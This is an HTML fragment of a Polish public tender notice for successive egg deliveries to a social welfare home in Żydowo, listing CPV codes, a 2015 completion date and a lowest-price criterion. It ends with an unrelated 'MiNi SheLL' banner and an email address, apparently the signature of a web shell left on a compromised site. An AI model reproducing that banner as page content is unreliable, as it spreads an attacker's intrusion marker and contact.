<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sukcesywne dostawy jaj konsumpcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy jaj konsumpcyjnych na potrzeby Domu   Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com